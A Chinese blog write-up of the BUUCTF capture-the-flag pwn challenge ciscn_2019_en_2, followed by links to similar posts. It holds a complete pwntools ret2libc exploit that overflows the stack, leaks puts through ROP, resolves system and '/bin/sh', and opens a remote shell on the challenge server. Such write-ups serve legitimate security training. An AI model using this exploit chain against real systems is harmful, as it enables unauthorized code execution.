BUUCTF-PWN-ciscn_2019_en_2

最新推荐文章于 2024-08-25 21:38:13 发布
最新推荐文章于 2024-08-25 21:38:13 发布
阅读量293 收藏
点赞数
分类专栏: pwn CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Henlenl/article/details/116974736
版权
本文通过一个具体的64位程序示例,详细解析了如何利用IDA进行程序分析,构造payload并最终实现远程代码执行的过程。涉及技术包括内存寻址、寄存器使用及系统调用。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

文章目录

查看文件信息

amd 64位系统 NX保护
在这里插入图片描述

IDA 分析

nc 程序连接一下
在这里插入图片描述

没什么东西 给了几个选择的按钮

IDA 64分析一波
在这里插入图片描述
发现其实程序就只能选择1 而且关键函数是encrypt

我们进去看一下
在这里插入图片描述
所以 只要让 var[13] = 17就行了

exp

但是 这里要说明一下 32位程序是能直接去内存中寻址执行的
64位就是要依靠寄存器来寻址 然后找到地址返回给程序去执行的

from pwn import*
from LibcSearcher import*

r=remote('node3.buuoj.cn',25608)
elf=ELF('./ciscn_2019_en_2')

main=0x400b28
pop_rdi=0x400c83
ret=0x4006b9

puts_plt=elf.plt['puts']
puts_got=elf.got['puts']

r.sendlineafter('choice!\n','1')
payload='\0'+'a'*(0x50-1+8)
payload+=p64(pop_rdi)
payload+=p64(puts_got)
payload+=p64(puts_plt)
payload+=p64(main)

r.sendlineafter('encrypted\n',payload)
r.recvline()
r.recvline()

puts_addr=u64(r.recvuntil('\n')[:-1].ljust(8,'\0'))
#puts_addr = u64(r.recvuntil('\n')[:-1].ljust(8,'\0'))
print hex(puts_addr)

libc=LibcSearcher('puts',puts_addr)
offset=puts_addr-libc.dump('puts')
binsh=offset+libc.dump('str_bin_sh')
system=offset+libc.dump('system')

r.sendlineafter('choice!\n','1')

payload='\0'+'a'*(0x50-1+8)
payload+=p64(ret)
payload+=p64(pop_rdi)
payload+=p64(binsh)
payload+=p64(system)

r.sendlineafter('encrypted\n',payload)

r.interactive()
ciscn_2019_en_2
m0sway的博客
03-25 1719
ciscn_2019_en_2 WriteUp BUU_PWN
ciscn_2019_en_3
fayinq的博客
03-14 542
ciscn_2019_en_3 首先写在前面的话,这道题找到关键点之后不能说十分简单,只能说非常的简单,但是这个题还是卡了我不久时间,最开始想了半天怎么泄露出libc地址,学过的方法全是不行,血压当场up。但是看了wp一眼之后就能秒杀了,当场高血压。 函数分析: Func_init(): Func_Execute(): 这其中本来是4个函数,但是show()和edit()函数没有东西,所以命名就省略了 Func_ADD(): Func_Free(): FREE的地方很明显,他
[BUUCTF]PWN9——ciscn_2019_en_2
mcmuyanga的博客
08-26 694
[BUUCTF]PWN9——ciscn_2019_en_2 题目网址:https://buuoj.cn/challenges#ciscn_2019_en_2 步骤: 例行检查,64位,开启了NX保护 nc一下看看程序的执行大概流程,看这个模样很眼熟 ida查看了一下程序,确定了跟之前的 [BUUCTF]PWN6——ciscn_2019_c_1 一样,具体的看那题的链接 exp: from pwn import* from LibcSearcher import* r=remote('node3.buu
[BUUCTF-pwn]——ciscn_2019_en_2
Y_peak的博客
02-10 891
[BUUCTF-pwn]——ciscn_2019_en_2 题目地址: https://buuoj.cn/challenges#ciscn_2019_en_2 题目: 这是一道和之前一摸一样的题,请点击
BUUCTF - PWNciscn_2019_en_2
古月浪子的博客
03-25 1252
不知道是不是题目重复了,反正我的另一篇博文的exp可以直接copy过来打通… 传送门:【BUUCTF - PWNciscn_2019_c_1 附件:ciscn_2019_en_2
[CTF]BUUCTF-PWN-ciscn_2019_en_2
weixin_53394081的博客
04-11 395
【CTF】BUUCTF-ciscn_2019_en_2 pwn
BUUCTF-PWN刷题记录-6
weixin_44145820的博客
04-14 922
目录picoctf_2018_are you rootciscn_2019_final_2 picoctf_2018_are you root 例行安全检查 菜单如下: 我们需要auth_level等于5才能get flag user结构体如下 struct USER{ char *name; long long auth_level; } 漏洞原理分析: 在login中分配了两次内存...
BUUCTF-PWN刷题日记(一)
weixin_45461609的博客
04-30 1551
BUUCTF-PWN刷题日记rip rip 简单的栈溢出 #coding=utf-8 from pwn import* #r = process('./pwn1') r = remote('node3.buuoj.cn',26123) sys_addr = 0x401186 #address of fun payload = 'a'*(0xf+8) + p64(sys_addr) r.sendli...
BUUCTF PWN-堆题总结 2021-09-27
m0_56897090的博客
09-27 2347
文章目录整体分析-2021-09-27新角度TcacheUAFFile结构体HourseOfForceUnlink经验新角度ciscn_2019_final_5分析EXPTCACHEhitcon_2018_children_tcache分析EXPUAFwustctf2020_easyfast分析EXPACTF_2019_babyheap分析EXPgyctf_2020_some_thing_interesting分析EXPbjdctf_2020_YDSneedGrirlfrien分析EXPciscn_2019
BUUCTFpwn】解题记录(1-3页已完结)
Assassin
05-05 2094
文章目录ripwarmup_csaw_2016ciscn_2019_n_1pwn1_sctf_2016jarvisoj_level0ciscn_2019_c_1(栈溢出+ret2libc+plt调用)[第五空间2019 决赛]PWN5ciscn_2019_n_8jarvisoj_level2[OGeek2019]babyropbjdctf_2020_babystackget_started_3dsctf_2016(mprotect+read+shellcode)cn_2019_en_2jarvisoj_le
BUUCTF pwn——ciscn_2019_en_2
CNS-Enterprise BCC-1701-J
04-05 190
BUUCTF 做题练习
[BUUCTF] ciscn_2019_en_2
最新发布
a3314019530的博客
08-25 265
程序里面既没有现成的system也没有/bin/sh字符串。所以思路应该是通过put函数泄露libc地址,然后拿到system函数和/bin/sh字符串实现攻击。用ida查看一下,只有输入1进入encrypt()函数内,然后利用gets函数可以实现栈溢出攻击。64位程序,开了NX保护。先checksec一下。
BUUCTF ciscn_2019_en_2
carol2358的博客
04-09 2532
这题整体的思路是ret2libc 先checksec 理一下题目: 只有功能1是能用的,输入1,来到encrypt函数,输入s,因为后面有strlen,所以\0截断,溢出为0x58 exp: from pwn import * from LibcSearcher import * context.os='linux' context.arch='amd64' context.log_l...
buuctf|ciscn_2019_en_2 1
m0_64236521的博客
05-02 734
ciscn_2019_en_2 1 下载后我重命名为pwn_14了 checksec一下 nx开启,可以栈溢出 64位,用ida看看 分析下,只有输入‘1’有用,即encrypt函数较为重要,进入encrypt 有gets(s),可以进行栈溢出,没有找到后门函数。 那基本思路有了,这里可以栈溢出,但要绕过strlen判断,之后就是基本的ROP,ret2libc。 exp如下 from pwn import* from LibcSearcher import* context(os='linux', ar
BUUCTF-Pwn-ciscn_2019_en_2
餐桌上的猫
03-04 163
题目截图
[BUUCTF]ciscn_2019_en_2解题思路
ctfpwn的博客
05-08 387
接下来通过计算偏移和libcsearcher拿到libc版本从而泄露system和bin/sh然后栈溢出获得shell。先用ROPgadget --binary fliename --only 'pop|ret' 找找gadgets。通过读c伪代码可以看出先是一个嵌套循环,然后输入v4的值,根据v4值来执行下面的代码。其中的0x4009A0是用来泄露puts函数的地址后返回encrypt函数再次运行。希望思路对各位有所帮助(本人真的很菜),如有不足请各位佬们指点。很明显有个gets函数的栈溢出。
ciscn_2019_pwn挑战赛:破解五道经典题目解析
资源摘要信息:"ciscn-2019-pwn包含五个不同难度级别的pwn挑战题目,分别为baby_pwn、bms、daily、Double和your_pwn。这些题目要求参赛者具备扎实的二进制漏洞挖掘和利用能力,以及对操作系统底层安全的深刻理解。接...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值